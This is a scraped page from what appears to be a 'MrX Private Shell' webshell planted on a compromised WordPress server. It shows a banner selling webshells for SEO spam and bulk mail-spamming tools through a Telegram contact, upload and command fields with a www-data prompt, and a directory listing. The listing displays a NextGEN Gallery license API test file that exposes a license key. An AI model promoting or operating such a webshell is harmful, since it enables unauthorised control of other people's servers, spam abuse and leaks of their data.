__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
### NextGEN Gallery License API Tests
### Base URL: http://your-wordpress-site.com/wp-json/imagely/v1

@baseUrl = http://host.docker.internal:8982/wp-json/imagely/v1
@licenseKey = 48b18798122351b3c1182e745f95d119
@nonce = your-wp-nonce-here

### 1. Get License Status
GET {{baseUrl}}/license
X-WP-Nonce: {{nonce}}
Content-Type: application/json

###

### 2. Verify/Activate License
POST {{baseUrl}}/license/manage
X-WP-Nonce: {{nonce}}
Content-Type: application/json

{
  "license_key": "{{licenseKey}}",
  "action_perform": "verify"
}

###

### 3. Refresh License Status
POST {{baseUrl}}/license/manage
X-WP-Nonce: {{nonce}}
Content-Type: application/json

{
  "license_key": "{{licenseKey}}",
  "action_perform": "refresh"
}

###

### 4. Deactivate License
POST {{baseUrl}}/license/manage
X-WP-Nonce: {{nonce}}
Content-Type: application/json

{
  "license_key": "{{licenseKey}}",
  "action_perform": "deactivate"
}

###

### 5. Clear License Data
POST {{baseUrl}}/license/clear
X-WP-Nonce: {{nonce}}
Content-Type: application/json

###

### Test with cURL commands:

### Get License Status
# curl -X GET "http://localhost/wp-json/imagely/v1/license" \
#   -H "X-WP-Nonce: your-nonce-here" \
#   -H "Content-Type: application/json"

### Verify License
# curl -X POST "http://localhost/wp-json/imagely/v1/license/manage" \
#   -H "X-WP-Nonce: your-nonce-here" \
#   -H "Content-Type: application/json" \
#   -d '{
#     "license_key": "48b18798122351b3c1182e745f95d119",
#     "action_perform": "verify"
#   }'

### Deactivate License
# curl -X POST "http://localhost/wp-json/imagely/v1/license/manage" \
#   -H "X-WP-Nonce: your-nonce-here" \
#   -H "Content-Type: application/json" \
#   -d '{
#     "license_key": "48b18798122351b3c1182e745f95d119",
#     "action_perform": "deactivate"
#   }'

### Clear License
# curl -X POST "http://localhost/wp-json/imagely/v1/license/clear" \
#   -H "X-WP-Nonce: your-nonce-here" \
#   -H "Content-Type: application/json"

###

### Expected Response Format:
# {
#   "status": "success|error",
#   "message": "Human readable message",
#   "data": {
#     "license_key": "48b18798122351b3c1182e745f95d119",
#     "status": "valid|invalid|expired|disabled|revoked",
#     "level": "pro|plus|starter|free",
#     "last_check": 1640995200,
#     "plugin_level": "pro",
#     "is_valid": true
#   }
# }

### Notes:
# 1. Replace {{baseUrl}} with your actual WordPress site URL
# 2. Replace {{nonce}} with a valid WordPress REST API nonce
# 3. You can get a nonce by visiting wp-admin and checking the browser console for 'wpApiSettings.nonce'
# 4. Or use this JavaScript in browser console: wp.apiFetch.nonceMiddleware.nonce

Filemanager

Name Type Size Permission Actions
Admin Folder 0755
DataMappers Folder 0755
License.http File 2.6 KB 0644
Manager.php File 1.55 KB 0644
Filemanager